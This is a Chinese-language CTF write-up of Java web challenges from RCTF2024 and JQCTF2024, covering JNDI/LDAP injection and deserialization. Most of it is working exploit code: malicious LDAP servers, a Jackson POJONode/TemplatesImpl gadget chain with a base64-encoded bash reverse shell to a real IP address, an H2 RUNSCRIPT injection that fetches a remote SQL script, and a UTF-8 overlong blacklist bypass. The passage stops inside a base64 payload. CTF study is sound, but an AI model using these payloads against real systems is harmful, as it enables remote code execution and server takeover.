WriteUp
May 27, 2024

JQCTF2024、RCTF2024 Web Writeup

image.png
dadf588497bf507a2b0ceac984d0297a.png

RCTF

OpenYourEyesToSeeTheWorld

一题考的是

new InitialDirContext(properties)).search该如何去触发Jndi。这一题指定post传入json,指定searchBase和filter。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
POST /index HTTP/1.1
Host: localhost:8899
sec-ch-ua-platform: "macOS"
Pragma: no-cache
sec-ch-ua-mobile: ?0
Cache-Control: no-cache
Accept-Encoding: gzip, deflate, br, zstd
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: none
Accept-Language: zh-CN,zh;q=0.9
Cookie: Goland-5df45c20=acaad4c4-6ed5-4e7f-a2f0-891765d48e30; Phpstorm-b9a68abe=849deb9b-548a-4ca8-8d65-7c13b6503159; Idea-44fa379b=c955cda9-e124-4dce-a7f3-1dc2bff3d8ba
sec-ch-ua: "Google Chrome";v="125", "Chromium";v="125", "Not.A/Brand";v="24"
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
Sec-Fetch-Dest: document
Content-Type: application/json

{"searchBase":"dc\u003Dexample,dc\u003Dcom","filter":"ObjectClass\u003D123","ip":"8.130.24.188","port":8088}

其实ldap的search就是lookup的另一个版本,他们都是进行筛选,只不过lookup是直接在url里筛选,search是另外启2个参数。在调试流程不难发现下述过程

我们会进入p_search方法内部,进而进入p_resolveIntermediate

假如我们进入c_resolveIntermediate_nns

那么就会进入c_lookup请求,进入c_lookup请求后

你就会看见熟悉的decodeObject了。这里可以进行反序列化。
而我们想进入c_resolveIntermediate_nns也很简单,Head或者Tail不为空即可,我们随便给searchBase加上个前缀。



最终进行反序列化了,然后就使用POJONODE打一个RCE的gadget就行。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
import java.net.*;
import java.text.ParseException;
import java.util.Base64;
import javax.naming.Reference;
import javax.naming.StringRefAddr;
import javax.net.ServerSocketFactory;
import javax.net.SocketFactory;
import javax.net.ssl.SSLSocketFactory;

import com.unboundid.ldap.listener.InMemoryDirectoryServer;
import com.unboundid.ldap.listener.InMemoryDirectoryServerConfig;
import com.unboundid.ldap.listener.InMemoryListenerConfig;
import com.unboundid.ldap.listener.interceptor.InMemoryInterceptedSearchResult;
import com.unboundid.ldap.listener.interceptor.InMemoryOperationInterceptor;
import com.unboundid.ldap.sdk.Entry;
import com.unboundid.ldap.sdk.LDAPException;
import com.unboundid.ldap.sdk.LDAPResult;
import com.unboundid.ldap.sdk.ResultCode;


public class DeserLdapRefServer {

    private static final String LDAP_BASE = "dc=example,dc=com";

    public static void lanuchLDAPServer(Integer ldap_port, String http_server, Integer http_port) throws Exception {
        try {
            InMemoryDirectoryServerConfig config = new InMemoryDirectoryServerConfig(LDAP_BASE);
            config.setListenerConfigs(new InMemoryListenerConfig(
                "listen",
                InetAddress.getByName("0.0.0.0"),
                ldap_port,
                ServerSocketFactory.getDefault(),
                SocketFactory.getDefault(),
                (SSLSocketFactory) SSLSocketFactory.getDefault()));

            config.addInMemoryOperationInterceptor(new OperationInterceptor(new URL("http://"+http_server+":"+http_port+"/#org.apache.tomcat.jdbc.pool.DataSourceFactory")));
            InMemoryDirectoryServer ds = new InMemoryDirectoryServer(config);
            System.out.println("Listening on 0.0.0.0:" + ldap_port);
            ds.startListening();
        }
        catch ( Exception e ) {
            e.printStackTrace();
        }
    }

    private static class OperationInterceptor extends InMemoryOperationInterceptor {

        private URL codebase;

        public OperationInterceptor ( URL cb ) {
            this.codebase = cb;
        }

        @Override
        public void processSearchResult ( InMemoryInterceptedSearchResult result ) {
            String base = result.getRequest().getBaseDN();
            Entry e = new Entry(base);
            try {
                sendResult(result, base, e);
            }
            catch ( Exception e1 ) {
                e1.printStackTrace();
            }

        }

        protected void sendResult ( InMemoryInterceptedSearchResult result, String base, Entry e ) throws Exception {
            URL turl = new URL(this.codebase, this.codebase.getRef().replace('.', '/').concat(".class"));
            System.out.println("Send LDAP reference result for " + base + " redirecting to " + turl);
            e.addAttribute("javaClassName", "javax.sql.DataSource");
            String cbstring = this.codebase.toString();
            int refPos = cbstring.indexOf('#');
            if ( refPos > 0 ) {
                cbstring = cbstring.substring(0, refPos);
            }
//          
            /** Payload1 end **/

            /** Payload2: Return Serialized Gadget **/
//            try {
                // java -jar ysoserial-0.0.6-SNAPSHOT-all.jar CommonsCollections6 '/Applications/Calculator.app/Contents/MacOS/Calculator'|base64
                e.addAttribute("javaSerializedData",Base64.getDecoder().decode("rO0ABXNyAC5qYXZheC5tYW5hZ2VtZW50LkJhZEF0dHJpYnV0ZVZhbHVlRXhwRXhjZXB0aW9u1Ofaq2MtRkACAAFMAAN2YWx0ABJMamF2YS9sYW5nL09iamVjdDt4cgATamF2YS5sYW5nLkV4Y2VwdGlvbtD9Hz4aOxzEAgAAeHIAE2phdmEubGFuZy5UaHJvd2FibGXVxjUnOXe4ywMABEwABWNhdXNldAAVTGphdmEvbGFuZy9UaHJvd2FibGU7TAANZGV0YWlsTWVzc2FnZXQAEkxqYXZhL2xhbmcvU3RyaW5nO1sACnN0YWNrVHJhY2V0AB5bTGphdmEvbGFuZy9TdGFja1RyYWNlRWxlbWVudDtMABRzdXBwcmVzc2VkRXhjZXB0aW9uc3QAEExqYXZhL3V0aWwvTGlzdDt4cHEAfgAIcHVyAB5bTGphdmEubGFuZy5TdGFja1RyYWNlRWxlbWVudDsCRio8PP0iOQIAAHhwAAAAAXNyABtqYXZhLmxhbmcuU3RhY2tUcmFjZUVsZW1lbnRhCcWaJjbdhQIABEkACmxpbmVOdW1iZXJMAA5kZWNsYXJpbmdDbGFzc3EAfgAFTAAIZmlsZU5hbWVxAH4ABUwACm1ldGhvZE5hbWVxAH4ABXhwAAAAKnQAKWNvbS5qYXZhc2VjLnBvY3MuamFja3Nvbi5CQVRlbXBsYXRlc0NoYWludAAVQkFUZW1wbGF0ZXNDaGFpbi5qYXZhdAAEbWFpbnNyACZqYXZhLnV0aWwuQ29sbGVjdGlvbnMkVW5tb2RpZmlhYmxlTGlzdPwPJTG17I4QAgABTAAEbGlzdHEAfgAHeHIALGphdmEudXRpbC5Db2xsZWN0aW9ucyRVbm1vZGlmaWFibGVDb2xsZWN0aW9uGUIAgMte9x4CAAFMAAFjdAAWTGphdmEvdXRpbC9Db2xsZWN0aW9uO3hwc3IAE2phdmEudXRpbC5BcnJheUxpc3R4gdIdmcdhnQMAAUkABHNpemV4cAAAAAB3BAAAAAB4cQB+ABV4c3IALGNvbS5mYXN0ZXJ4bWwuamFja3Nvbi5kYXRhYmluZC5ub2RlLlBPSk9Ob2RlAAAAAAAAAAICAAFMAAZfdmFsdWVxAH4AAXhyAC1jb20uZmFzdGVyeG1sLmphY2tzb24uZGF0YWJpbmQubm9kZS5WYWx1ZU5vZGUAAAAAAAAAAQIAAHhyADBjb20uZmFzdGVyeG1sLmphY2tzb24uZGF0YWJpbmQubm9kZS5CYXNlSnNvbk5vZGUAAAAAAAAAAQIAAHhwc30AAAABAB1qYXZheC54bWwudHJhbnNmb3JtLlRlbXBsYXRlc3hyABdqYXZhLmxhbmcucmVmbGVjdC5Qcm94eeEn2iDMEEPLAgABTAABaHQAJUxqYXZhL2xhbmcvcmVmbGVjdC9JbnZvY2F0aW9uSGFuZGxlcjt4cHNyADRvcmcuc3ByaW5nZnJhbWV3b3JrLmFvcC5mcmFtZXdvcmsuSmRrRHluYW1pY0FvcFByb3h5TMS0cQ7rlvwCAANaAA1lcXVhbHNEZWZpbmVkWgAPaGFzaENvZGVEZWZpbmVkTAAHYWR2aXNlZHQAMkxvcmcvc3ByaW5nZnJhbWV3b3JrL2FvcC9mcmFtZXdvcmsvQWR2aXNlZFN1cHBvcnQ7eHAAAHNyADBvcmcuc3ByaW5nZnJhbWV3b3JrLmFvcC5mcmFtZXdvcmsuQWR2aXNlZFN1cHBvcnQky4o8+qTFdQIABloAC3ByZUZpbHRlcmVkWwAMYWR2aXNvckFycmF5dAAiW0xvcmcvc3ByaW5nZnJhbWV3b3JrL2FvcC9BZHZpc29yO0wAE2Fkdmlzb3JDaGFpbkZhY3Rvcnl0ADdMb3JnL3NwcmluZ2ZyYW1ld29yay9hb3AvZnJhbWV3b3JrL0Fkdmlzb3JDaGFpbkZhY3Rvcnk7TAAIYWR2aXNvcnNxAH4AB0wACmludGVyZmFjZXNxAH4AB0wADHRhcmdldFNvdXJjZXQAJkxvcmcvc3ByaW5nZnJhbWV3b3JrL2FvcC9UYXJnZXRTb3VyY2U7eHIALW9yZy5zcHJpbmdmcmFtZXdvcmsuYW9wLmZyYW1ld29yay5Qcm94eUNvbmZpZ4tL8+an4PdvAgAFWgALZXhwb3NlUHJveHlaAAZmcm96ZW5aAAZvcGFxdWVaAAhvcHRpbWl6ZVoAEHByb3h5VGFyZ2V0Q2xhc3N4cAAAAAAAAHVyACJbTG9yZy5zcHJpbmdmcmFtZXdvcmsuYW9wLkFkdmlzb3I734MNrdIehHQCAAB4cAAAAABzcgA8b3JnLnNwcmluZ2ZyYW1ld29yay5hb3AuZnJhbWV3b3JrLkRlZmF1bHRBZHZpc29yQ2hhaW5GYWN0b3J5VN1kN+JOcfcCAAB4cHNyABRqYXZhLnV0aWwuTGlua2VkTGlzdAwpU11KYIgiAwAAeHB3BAAAAAB4c3EAfgAUAAAAAHcEAAAAAHhzcgA0b3JnLnNwcmluZ2ZyYW1ld29yay5hb3AudGFyZ2V0LlNpbmdsZXRvblRhcmdldFNvdXJjZX1VbvXH+Pq6AgABTAAGdGFyZ2V0cQB+AAF4cHNyADpjb20uc3VuLm9yZy5hcGFjaGUueGFsYW4uaW50ZXJuYWwueHNsdGMudHJheC5UZW1wbGF0ZXNJbXBsCVdPwW6sqzMDAAZJAA1faW5kZW50TnVtYmVySQAOX3RyYW5zbGV0SW5kZXhbAApfYnl0ZWNvZGVzdAADW1tCWwAGX2NsYXNzdAASW0xqYXZhL2xhbmcvQ2xhc3M7TAAFX25hbWVxAH4ABUwAEV9vdXRwdXRQcm9wZXJ0aWVzdAAWTGphdmEvdXRpbC9Qcm9wZXJ0aWVzO3hwAAAAAP////91cgADW1tCS/0ZFWdn2zcCAAB4cAAAAAF1cgACW0Ks8xf4BghU4AIAAHhwAAABxsr+ur4AAAAxABkBAAVLVmlZawcAAQEAQGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ydW50aW1lL0Fic3RyYWN0VHJhbnNsZXQHAAMBAAY8aW5pdD4BAAMoKVYBAARDb2RlBwADDAAFAAYKAAgACQEAEWphdmEvbGFuZy9SdW50aW1lBwALAQAKZ2V0UnVudGltZQEAFSgpTGphdmEvbGFuZy9SdW50aW1lOwwADQAOCgAMAA8BAGliYXNoIC1jIHtlY2hvLFltRnphQ0F0WXlBaVltRnphQ0F0YVNBK0ppQXZaR1YyTDNSamNDODRMakV6TUM0eU5DNHhPRGd2TnpjM09DQThKakVpfXx7YmFzZTY0LC1kfXx7YmFzaCwtaX0IABEBAARleGVjAQAnKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL1Byb2Nlc3M7DAATABQKAAwAFQEAClNvdXJjZUZpbGUBAApLVmlZay5qYXZhACEAAgAEAAAAAAABAAEABQAGAAEABwAAABoAAgABAAAADiq3AAq4ABASErYAFlexAAAAAAABABcAAAACABhwdAAIYm9vZ2lwb3BwdwEAeA=="));

//            } catch (ParseException e1) {
//                e1.printStackTrace();
//            }
            /** Payload2 end **/

            result.sendSearchEntry(e);
            result.setResult(new LDAPResult(0, ResultCode.SUCCESS));
        }

    }
    public static void main(String[] args) throws Exception {

//        System.out.println("HttpServerAddress: "+args[0]);
//        System.out.println("HttpServerPort: "+args[1]);
//        System.out.println("LDAPServerPort: "+args[2]);
        String http_server_ip = "127.0.0.1";
        int ldap_port = 8088;
        int http_server_port = 8000;

        CodebaseServer.lanuchCodebaseURLServer(http_server_ip, http_server_port);
        lanuchLDAPServer(ldap_port, http_server_ip, http_server_port);
    }
}

JQCTF

ezjvav

admin/admin 正常登录
访问source
提示不是jsrc用户,猜了一下 jsrc是 jwt key 就没有然后了
黑名单如下

1
2
3
4
5
6
7
8
9
10
11
// 弱黑名单 通过bytes比较
java.util.HashMap
com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl
com.alibaba.fastjson.JSONArrayLlist



javax.management.BadAttributeValueExpException
com.sun.syndication.feed.impl.ToStringBean
java.security.SignedObject
com.sun.rowset.JdbcRowSetImpl

弱黑名单可以用utf-8-overlong直接绕过,墙黑名单ban了和没ban一样的,没啥区别,直接打jackson的pojonode就行了。exp如下

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
package com.javasec.pocs.jackson;

import com.alibaba.fastjson.JSONObject;
import com.fasterxml.jackson.databind.node.POJONode;
import com.javasec.utils.SerializeUtils;
import com.sun.org.apache.xpath.internal.objects.XString;
import com.sun.syndication.feed.impl.ToStringBean;
import org.springframework.aop.framework.AdvisedSupport;
import org.springframework.aop.target.HotSwappableTargetSource;

import javax.sql.DataSource;
import javax.xml.transform.Templates;
import java.io.ByteArrayOutputStream;
import java.io.FileOutputStream;
import java.io.ObjectOutputStream;
import java.lang.reflect.Constructor;
import java.lang.reflect.InvocationHandler;
import java.lang.reflect.Proxy;
import java.util.Base64;
import java.util.HashMap;


public class XstringTemplateChain {
    public static void main(String[] args) throws Exception{
        SerializeUtils.OverideJackson();
//        Templates templates = SerializeUtils.getTemplateByclass("/Applications/CTFLearning/JavaSec/target/production/JavaSec/com/javasec/memshell/HW/IndexController.class");
        Templates templates = SerializeUtils.getTemplate("bash -c {echo,YmFzaCAtYyAiYmFzaCAtaSA+JiAvZGV2L3RjcC84LjEzMC4yNC4xODgvNzc3OCA8JjEi}|{base64,-d}|{bash,-i}");
        AdvisedSupport advisedSupport = new AdvisedSupport();
        advisedSupport.setTarget(templates);
        Constructor constructor = Class.forName("org.springframework.aop.framework.JdkDynamicAopProxy").getConstructor(AdvisedSupport.class);
        constructor.setAccessible(true);
        InvocationHandler handler = (InvocationHandler) constructor.newInstance(advisedSupport);
        Object proxy = Proxy.newProxyInstance(ClassLoader.getSystemClassLoader(), new Class[]{Templates.class}, handler);
//        JSONObject jsonObject = new JSONObject();
//        jsonObject.put("poc",templates);
        POJONode jsonNodes = new POJONode(proxy);
        HotSwappableTargetSource h2 = new HotSwappableTargetSource(new XString("123"));
        HotSwappableTargetSource h1 = new HotSwappableTargetSource(jsonNodes);
        // 执行序列化与反序列化,并且返回序列化数据
        HashMap<Object, Object> map = SerializeUtils.makeMap(h1, h2);
        System.out.println(base64serial(map));
    }
    public static String base64serial(Object o) throws Exception {
        ByteArrayOutputStream baos = new ByteArrayOutputStream();
        CustomObjectOutputStream oos = new CustomObjectOutputStream(baos);
        oos.writeObject(o);
        oos.close();

        String base64String = Base64.getEncoder().encodeToString(baos.toByteArray());
        return base64String;

    }
}


直接sudo读flag就行了。

ezldap


actuator 接口泄露

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
{
  "_links": {
    "self": {
      "href": "http://10.233.71.102:8080/actuator",
      "templated": false
    },
    "beans": {
      "href": "http://10.233.71.102:8080/actuator/beans",
      "templated": false
    },
    "caches": {
      "href": "http://10.233.71.102:8080/actuator/caches",
      "templated": false
    },
    "caches-cache": {
      "href": "http://10.233.71.102:8080/actuator/caches/{cache}",
      "templated": true
    },
    "health-path": {
      "href": "http://10.233.71.102:8080/actuator/health/{*path}",
      "templated": true
    },
    "health": {
      "href": "http://10.233.71.102:8080/actuator/health",
      "templated": false
    },
    "info": {
      "href": "http://10.233.71.102:8080/actuator/info",
      "templated": false
    },
    "conditions": {
      "href": "http://10.233.71.102:8080/actuator/conditions",
      "templated": false
    },
    "configprops": {
      "href": "http://10.233.71.102:8080/actuator/configprops",
      "templated": false
    },
    "configprops-prefix": {
      "href": "http://10.233.71.102:8080/actuator/configprops/{prefix}",
      "templated": true
    },
    "env-toMatch": {
      "href": "http://10.233.71.102:8080/actuator/env/{toMatch}",
      "templated": true
    },
    "env": {
      "href": "http://10.233.71.102:8080/actuator/env",
      "templated": false
    },
    "loggers-name": {
      "href": "http://10.233.71.102:8080/actuator/loggers/{name}",
      "templated": true
    },
    "loggers": {
      "href": "http://10.233.71.102:8080/actuator/loggers",
      "templated": false
    },
    "heapdump": {
      "href": "http://10.233.71.102:8080/actuator/heapdump",
      "templated": false
    },
    "threaddump": {
      "href": "http://10.233.71.102:8080/actuator/threaddump",
      "templated": false
    },
    "metrics": {
      "href": "http://10.233.71.102:8080/actuator/metrics",
      "templated": false
    },
    "metrics-requiredMetricName": {
      "href": "http://10.233.71.102:8080/actuator/metrics/{requiredMetricName}",
      "templated": true
    },
    "scheduledtasks": {
      "href": "http://10.233.71.102:8080/actuator/scheduledtasks",
      "templated": false
    },
    "mappings": {
      "href": "http://10.233.71.102:8080/actuator/mappings",
      "templated": false
    }
  }
}

查看 mappings 发现 source 端点

源码泄露路由

1
2
3
4
5
6
7
8
9
10
11
@GetMapping("/lookup")
public String lookup(String path) {
try {
    String url = "ldap://" + path;
    InitialContext initialContext = new InitialContext();
    initialContext.lookup(url);
    return "ok";
}catch (NamingException e){
    return "failed";
}
}

并且题目的环境是jdk17,这里就涉及到一个JDK17环境下的Ldap打法,我们先尽可能的搜集信息。

configprops根据hint去搜索pool,就只能看到Tomcat Connection,这里fuzz了一波发现是tomcat-jdbc依赖。我们可以配合h2去打一个rce就好。但是我们还需要注意一个东西

trustSerialData为false

那么就说明我们无法走ldap的deserialization路线,只能选择走下面的decodeRefence去配合ObjectFacotry打一个组合拳。而我们想走decodeRefence就需要设置javaNamingRefence


我们成功的进入了decodeReference,在这里我们会对我们传入的attrs做一个处理,去new一个Reference对象

我们选择我们的组合拳套餐。我们配合tomcat-jdbc去打h2,但这里还有个问题就是指定h2的jdbcUrl,这里我们需要利用到另一个变量

javaReferenceAddr,我们会取ldapserver给的这个值,然后对他做一个分隔处理。可以看到上图中用@隔开了变量名和值,传入了url为恶意的jdbc字符串。随之我们就会进入DatasourceFactory#getObjectInstance

最终发起H2连接RCE。

恶意LdapServer如下

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
import java.net.*;
import java.text.ParseException;
import java.util.Base64;
import javax.naming.Reference;
import javax.naming.StringRefAddr;
import javax.net.ServerSocketFactory;
import javax.net.SocketFactory;
import javax.net.ssl.SSLSocketFactory;

import com.unboundid.ldap.listener.InMemoryDirectoryServer;
import com.unboundid.ldap.listener.InMemoryDirectoryServerConfig;
import com.unboundid.ldap.listener.InMemoryListenerConfig;
import com.unboundid.ldap.listener.interceptor.InMemoryInterceptedSearchResult;
import com.unboundid.ldap.listener.interceptor.InMemoryOperationInterceptor;
import com.unboundid.ldap.sdk.Entry;
import com.unboundid.ldap.sdk.LDAPException;
import com.unboundid.ldap.sdk.LDAPResult;
import com.unboundid.ldap.sdk.ResultCode;


public class HackerLDAPRefServer {

    private static final String LDAP_BASE = "dc=example,dc=com";

    public static void lanuchLDAPServer(Integer ldap_port, String http_server, Integer http_port) throws Exception {
        try {
            InMemoryDirectoryServerConfig config = new InMemoryDirectoryServerConfig(LDAP_BASE);
            config.setListenerConfigs(new InMemoryListenerConfig(
                    "listen",
                    InetAddress.getByName("0.0.0.0"),
                    ldap_port,
                    ServerSocketFactory.getDefault(),
                    SocketFactory.getDefault(),
                    (SSLSocketFactory) SSLSocketFactory.getDefault()));

            config.addInMemoryOperationInterceptor(new OperationInterceptor(new URL("http://"+http_server+":"+http_port+"/#org.apache.tomcat.jdbc.pool.DataSourceFactory")));
            InMemoryDirectoryServer ds = new InMemoryDirectoryServer(config);
            System.out.println("Listening on 0.0.0.0:" + ldap_port);
            ds.startListening();
        }
        catch ( Exception e ) {
            e.printStackTrace();
        }
    }

    private static class OperationInterceptor extends InMemoryOperationInterceptor {

        private URL codebase;

        public OperationInterceptor ( URL cb ) {
            this.codebase = cb;
        }

        @Override
        public void processSearchResult ( InMemoryInterceptedSearchResult result ) {
            String base = result.getRequest().getBaseDN();
            Entry e = new Entry(base);
            try {
                sendResult(result, base, e);
            }
            catch ( Exception e1 ) {
                e1.printStackTrace();
            }

        }

        protected void sendResult ( InMemoryInterceptedSearchResult result, String base, Entry e ) throws Exception {
            URL turl = new URL(this.codebase, this.codebase.getRef().replace('.', '/').concat(".class"));
            System.out.println("Send LDAP reference result for " + base + " redirecting to " + turl);
            e.addAttribute("javaClassName", "javax.sql.DataSource");
            String cbstring = this.codebase.toString();
            int refPos = cbstring.indexOf('#');
            if ( refPos > 0 ) {
                cbstring = cbstring.substring(0, refPos);
            }
//            Reference ref = new Reference("javax.sql.DataSource","com.zaxxer.hikari.HikariJNDIFactory",null);
//            String url = "jdbc:h2:mem:testdb;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM 'http://8.130.24.188:7791/poc.sql'";
//            ref.add(new StringRefAddr("driverClassName","org.h2.Driver"));
//            ref.add(new StringRefAddr("jdbcUrl",url));
//            ref.add(new StringRefAddr("username","root"));
//            ref.add(new StringRefAddr("password","password"));
//            ref.add(new StringRefAddr("initialSize","1"));
//
//            e.addAttribute("javaSerializedData", Base64.getDecoder().decode( SerializeUtils.base64serial(ref)));

            /** Payload1: Return Reference Factory **/
             e.addAttribute("javaCodeBase", cbstring);
             e.addAttribute("javaReferenceAddress", "@0@url@jdbc:h2:mem:testdb;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM 'http://8.130.24.188:7791/poc.sql'");
//             e.addAttribute("javaReferenceAddress", "@0@url@jdbc:h2:mem:test;MODE=MSSQLServer;init=CREATE TRIGGER shell3 BEFORE SELECT ON\nINFORMATION_SCHEMA.TABLES AS $$//javascript\njava.lang.Runtime.getRuntime().exec('open /')\n$$\n");
             e.addAttribute("objectClass", "javaNamingReference");
             e.addAttribute("javaFactory", this.codebase.getRef());
            String url = "jdbc:h2:mem:testdb;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM 'http://8.130.24.188:7791/poc.sql'";
            e.addAttribute("driverClassName","org.h2.Driver");
            e.addAttribute("jdbcUrl",url);
            /** Payload1 end **/

            /** Payload2: Return Serialized Gadget **/
//            try {
//                // java -jar ysoserial-0.0.6-SNAPSHOT-all.jar CommonsCollections6 '/Applications/Calculator.app/Contents/MacOS/Calculator'|base64
//                e.addAttribute("javaSerializedData",Base64.decode("rO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcAUH2sHDFmDRAwACRgAKbG9hZEZhY3RvckkACXRocmVzaG9sZHhwP0AAAAAAAAB3CAAAAAIAAAACc3IAI29yZy5oaWJlcm5hdGUuZW5naW5lLnNwaS5UeXBlZFZhbHVlh4gUshmh5zwCAAJMAAR0eXBldAAZTG9yZy9oaWJlcm5hdGUvdHlwZS9UeXBlO0wABXZhbHVldAASTGphdmEvbGFuZy9PYmplY3Q7eHBzcgAgb3JnLmhpYmVybmF0ZS50eXBlLkNvbXBvbmVudFR5cGXHO08ZYmxfcgIADVoAHGNyZWF0ZUVtcHR5Q29tcG9zaXRlc0VuYWJsZWRaABJoYXNOb3ROdWxsUHJvcGVydHlaAAVpc0tleUkADHByb3BlcnR5U3BhbkwAD2NhbkRvRXh0cmFjdGlvbnQAE0xqYXZhL2xhbmcvQm9vbGVhbjtbAAdjYXNjYWRldAAoW0xvcmcvaGliZXJuYXRlL2VuZ2luZS9zcGkvQ2FzY2FkZVN0eWxlO0wAEWNvbXBvbmVudFR1cGxpemVydAAxTG9yZy9oaWJlcm5hdGUvdHVwbGUvY29tcG9uZW50L0NvbXBvbmVudFR1cGxpemVyO0wACmVudGl0eU1vZGV0ABpMb3JnL2hpYmVybmF0ZS9FbnRpdHlNb2RlO1sAC2pvaW5lZEZldGNodAAaW0xvcmcvaGliZXJuYXRlL0ZldGNoTW9kZTtbAA1wcm9wZXJ0eU5hbWVzdAATW0xqYXZhL2xhbmcvU3RyaW5nO1sAE3Byb3BlcnR5TnVsbGFiaWxpdHl0AAJbWlsADXByb3BlcnR5VHlwZXN0ABpbTG9yZy9oaWJlcm5hdGUvdHlwZS9UeXBlO1sAIXByb3BlcnR5VmFsdWVHZW5lcmF0aW9uU3RyYXRlZ2llc3QAJltMb3JnL2hpYmVybmF0ZS90dXBsZS9WYWx1ZUdlbmVyYXRpb247eHIAH29yZy5oaWJlcm5hdGUudHlwZS5BYnN0cmFjdFR5cGXJFpSxstQ41AIAAHhwAAAAAAAAAXBwc3IAM29yZy5oaWJlcm5hdGUudHVwbGUuY29tcG9uZW50LlBvam9Db21wb25lbnRUdXBsaXplcsBwOcjTg59YAgAETAAOY29tcG9uZW50Q2xhc3N0ABFMamF2YS9sYW5nL0NsYXNzO0wACW9wdGltaXplcnQAMExvcmcvaGliZXJuYXRlL2J5dGVjb2RlL3NwaS9SZWZsZWN0aW9uT3B0aW1pemVyO0wADHBhcmVudEdldHRlcnQAKkxvcmcvaGliZXJuYXRlL3Byb3BlcnR5L2FjY2Vzcy9zcGkvR2V0dGVyO0wADHBhcmVudFNldHRlcnQAKkxvcmcvaGliZXJuYXRlL3Byb3BlcnR5L2FjY2Vzcy9zcGkvU2V0dGVyO3hyADdvcmcuaGliZXJuYXRlLnR1cGxlLmNvbXBvbmVudC5BYnN0cmFjdENvbXBvbmVudFR1cGxpemVy8vZxKVYnaN0CAAVaABJoYXNDdXN0b21BY2Nlc3NvcnNJAAxwcm9wZXJ0eVNwYW5bAAdnZXR0ZXJzdAArW0xvcmcvaGliZXJuYXRlL3Byb3BlcnR5L2FjY2Vzcy9zcGkvR2V0dGVyO0wADGluc3RhbnRpYXRvcnQAIkxvcmcvaGliZXJuYXRlL3R1cGxlL0luc3RhbnRpYXRvcjtbAAdzZXR0ZXJzdAArW0xvcmcvaGliZXJuYXRlL3Byb3BlcnR5L2FjY2Vzcy9zcGkvU2V0dGVyO3hwAAAAAAB1cgArW0xvcmcuaGliZXJuYXRlLnByb3BlcnR5LmFjY2Vzcy5zcGkuR2V0dGVyOyaF+ANJPbfPAgAAeHAAAAABc3IAPW9yZy5oaWJlcm5hdGUucHJvcGVydHkuYWNjZXNzLnNwaS5HZXR0ZXJNZXRob2RJbXBsJFNlcmlhbEZvcm2sW7ZWyd0bWAIABEwADmNvbnRhaW5lckNsYXNzcQB+ABNMAA5kZWNsYXJpbmdDbGFzc3EAfgATTAAKbWV0aG9kTmFtZXQAEkxqYXZhL2xhbmcvU3RyaW5nO0wADHByb3BlcnR5TmFtZXEAfgAfeHB2cgAwamF2YXguc3dpbmcuSkZvcm1hdHRlZFRleHRGaWVsZCRGb2N1c0xvc3RIYW5kbGVyDZKYQeXd2OkCAAFMAAZ0aGlzJDB0ACFMamF2YXgvc3dpbmcvSkZvcm1hdHRlZFRleHRGaWVsZDt4cHEAfgAjdAADcnVudAAEdGVzdHBwcHBwcHBwcHB1cgAaW0xvcmcuaGliZXJuYXRlLnR5cGUuVHlwZTt+r6uh5JVhmgIAAHhwAAAAAXEAfgARcHNxAH4AIXNyAB9qYXZheC5zd2luZy5KRm9ybWF0dGVkVGV4dEZpZWxkEwcjMaVrPZsDAAtaABJjb21wb3NlZFRleHRFeGlzdHNaAAllZGl0VmFsaWRaAAZlZGl0ZWRJABFmb2N1c0xvc3RCZWhhdmlvckwAEGRvY3VtZW50TGlzdGVuZXJ0ACRMamF2YXgvc3dpbmcvZXZlbnQvRG9jdW1lbnRMaXN0ZW5lcjtMAAdmYWN0b3J5dAA6TGphdmF4L3N3aW5nL0pGb3JtYXR0ZWRUZXh0RmllbGQkQWJzdHJhY3RGb3JtYXR0ZXJGYWN0b3J5O0wAEGZvY3VzTG9zdEhhbmRsZXJ0ADJMamF2YXgvc3dpbmcvSkZvcm1hdHRlZFRleHRGaWVsZCRGb2N1c0xvc3RIYW5kbGVyO0wABmZvcm1hdHQAM0xqYXZheC9zd2luZy9KRm9ybWF0dGVkVGV4dEZpZWxkJEFic3RyYWN0Rm9ybWF0dGVyO0wABG1hc2txAH4ABEwAFnRleHRGb3JtYXR0ZXJBY3Rpb25NYXB0ABdMamF2YXgvc3dpbmcvQWN0aW9uTWFwO0wABXZhbHVlcQB+AAR4cgAWamF2YXguc3dpbmcuSlR